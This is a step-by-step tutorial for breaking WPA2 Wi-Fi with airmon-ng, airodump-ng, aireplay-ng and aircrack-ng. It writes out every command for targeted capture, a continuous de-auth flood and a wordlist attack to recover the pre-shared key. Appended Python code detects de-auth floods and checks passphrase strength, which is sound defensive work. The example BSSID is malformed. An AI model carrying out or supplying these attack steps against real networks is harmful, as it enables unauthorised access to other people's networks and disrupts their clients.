Breaking WPA2 Wireless – (Step by Step with Commands) – BT5r3 Tested


FOLLOW ARTICLE BELOW (Step by Step with Commands)

#Tools used:
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng


#…Let’s begin
– Before starting, make sure eth0, lo and wlan0 are present (open a terminal and run ifconfig).
– Put the wireless interface into monitor mode, run:
airmon-ng start wlan0
– After executing the above command, you should get a new interface mon0 (monitor mode enabled).
– Verify that both interfaces are up and running, run:
airmon-ng
– Look for wlan0 and mon0 in the output. Then, to list all the APs that Kali Linux can see, run:
airodump-ng mon0
#Next steps
– In this next step, note the ESSID, BSSID & ENCRYPTION (ENC) of the target wireless network
(in this case, let’s assume the ESSID is nhc-bj, ENC is WPA2 & BSSID is 00:A1:B2:11:20:13:5T)
– Press CTRL+C
– Run:
airodump-ng -w FILE -c 1 --bssid 00:A1:B2:11:20:13:5T mon0
(-c is the channel; it is 1 for the BSSID we are targeting. -w sets the output file prefix, here FILE.) Everything the tools capture from here on is stored in the FILE we just created.
– Once you execute the above command, it starts collecting information and writes it to our file named “FILE”.
– You can leave it open so it keeps collecting, or, as discussed in the earlier part of this post, you can carry out a de-auth attack.
– For that, open a new window (clone the session) and run the de-auth attack.
– Run:
aireplay-ng -0 0 -a 00:A1:B2:11:20:13:5T mon0
(Let it run for 60sec)
– CTRL+C
– Check it out in the other window that we left open.
– CTRL+C
– Run:
ls
(you will get files as FILE-01.cap FILE-01.csv and others)
– Now, we use a dictionary attack. Run:
aircrack-ng FILE-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
– The process starts for discovering a Pre-Shared Key (Password).
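A de-auth flood like the one in the steps above is loud on the air: a wireless IDS spots it by counting deauthentication and disassociation management frames per BSSID inside a short sliding window, which is something a network owner can run on the same kind of monitor-mode capture. The Python below is an added example, not code from the original post or from the aircrack-ng project. It runs that check over a constructed list of frame records (timestamp, 802.11 management subtype, BSSID, destination); the 20-frames-in-10-seconds threshold is an assumed tuning value.

```python
from collections import deque

# 802.11 management-frame subtypes as defined in the standard
DEAUTH = 0x0C      # Deauthentication
DISASSOC = 0x0A    # Disassociation: abused the same way, so counted too
BEACON = 0x08      # Beacon: ordinary AP traffic, ignored by the detector
BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_flood(frames, window_s=10.0, threshold=20):
    """Scan (timestamp, subtype, bssid, dst) records in time order and return
    one alert per BSSID whose deauth/disassoc count inside any window_s-second
    window reaches threshold.
    Alert = (bssid, window_start_ts, count, broadcast_seen).
    window_s and threshold are assumed tuning values, not vendor defaults."""
    recent = {}      # bssid -> deque of recent deauth/disassoc timestamps
    broadcast = {}   # bssid -> True once a frame was addressed to broadcast
    alerted = set()
    alerts = []
    for ts, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent.setdefault(bssid, deque())
        q.append(ts)
        if dst == BROADCAST:
            broadcast[bssid] = True
        # Drop timestamps that fell out of the sliding window
        while ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((bssid, q[0], len(q), broadcast.get(bssid, False)))
    return alerts


# Constructed sample: one AP sees a handful of legitimate deauths over five
# minutes; another is hit by a burst of broadcast deauths of the kind a
# continuous "-0 0" attack produces.
AP_QUIET = "aa:bb:cc:00:00:01"
AP_FLOODED = "aa:bb:cc:00:00:02"
SAMPLE_FRAMES = (
    [(float(t), BEACON, AP_QUIET, BROADCAST) for t in range(0, 300, 100)]
    + [(50.0, DEAUTH, AP_QUIET, "11:22:33:44:55:66"),
       (150.0, DISASSOC, AP_QUIET, "11:22:33:44:55:67"),
       (250.0, DEAUTH, AP_QUIET, "11:22:33:44:55:66")]
    + [(round(100.0 + i * 0.1, 1), DEAUTH, AP_FLOODED, BROADCAST)
       for i in range(40)]
)

if __name__ == "__main__":
    for bssid, start, count, bcast in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"ALERT {bssid}: {count} deauth/disassoc frames from t={start}s"
              f"{' (broadcast)' if bcast else ''}")
```

The quiet AP's three deauths over five minutes never reach the threshold, while the flooded AP trips it on the 20th frame of the burst. On the AP side, the mitigation for this class of attack is 802.11w Protected Management Frames, which authenticates deauth and disassoc frames so forged ones are dropped by clients.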

Conclusion: We can find hidden SSIDs, bypass MAC filters and even crack WPA2. Now, how do we secure our WiFi? Use really strong passphrases with mixed-up content, so that a dictionary attack fails to find them in its list.
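The conclusion's advice can be made concrete: before a passphrase goes on the router, check it the way the dictionary attack above would (is it, or its base word, in a wordlist?) and estimate how much guessing it would survive. The Python below is an added example, not part of the original post. The tiny WORDLIST stands in for a real cracking list such as darkc0de.lst, the 60-bit entropy floor is an assumed policy, and the trailing-suffix stripping in _base_word mirrors the kind of rule cracking tools commonly apply; none of these come from the page.

```python
import math
import secrets
import string

# Constructed stand-in for a cracking wordlist (real lists hold millions of
# entries; the check is the same).
WORDLIST = {"password", "12345678", "qwertyuiop", "letmein", "iloveyou",
            "sunshine", "nhc-bj"}

# Assumed policy floor. WPA2-Personal itself only requires 8..63 ASCII characters.
MIN_ENTROPY_BITS = 60


def _base_word(passphrase):
    """Strip a trailing run of digits/punctuation so 'sunshine1' is still caught
    as the wordlist entry 'sunshine' (assumption: attackers apply such rules)."""
    return passphrase.lower().rstrip(string.digits + string.punctuation)


def wpa2_passphrase_report(passphrase, wordlist=WORDLIST):
    """Return a dict with length, a naive entropy estimate and the list of issues
    found; ok is True only when no issue was raised."""
    issues = []
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        issues.append("WPA2-Personal passphrases must be 8 to 63 ASCII characters")
    if passphrase.lower() in wordlist or _base_word(passphrase) in wordlist:
        issues.append("matches a wordlist entry: a dictionary attack will recover it")
    # Entropy estimate: length x log2 of the size of the character classes used.
    classes = [cls for cls in (string.ascii_lowercase, string.ascii_uppercase,
                               string.digits, string.punctuation + " ")
               if any(ch in cls for ch in passphrase)]
    pool = sum(len(cls) for cls in classes)
    entropy_bits = len(passphrase) * math.log2(pool) if pool else 0.0
    if entropy_bits < MIN_ENTROPY_BITS:
        issues.append(f"estimated {entropy_bits:.0f} bits of entropy, "
                      f"below the {MIN_ENTROPY_BITS}-bit floor")
    return {"length": len(passphrase), "entropy_bits": round(entropy_bits, 1),
            "issues": issues, "ok": not issues}


def generate_passphrase(length=24):
    """Random passphrase from the OS CSPRNG; no wordlist can contain it."""
    alphabet = string.ascii_letters + string.digits + "-_.,!:;"
    return "".join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    for candidate in ("password", "sunshine1", "correct horse battery staple",
                      generate_passphrase()):
        report = wpa2_passphrase_report(candidate)
        status = "OK " if report["ok"] else "BAD"
        print(f"{status} {candidate!r}: {report['entropy_bits']} bits; "
              f"{'; '.join(report['issues']) or 'no issues'}")
```

The entropy figure is an upper bound (it assumes every character was chosen uniformly), so the wordlist check is the one that matters most: a passphrase that is in the list falls to the attack above regardless of how long it looks.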
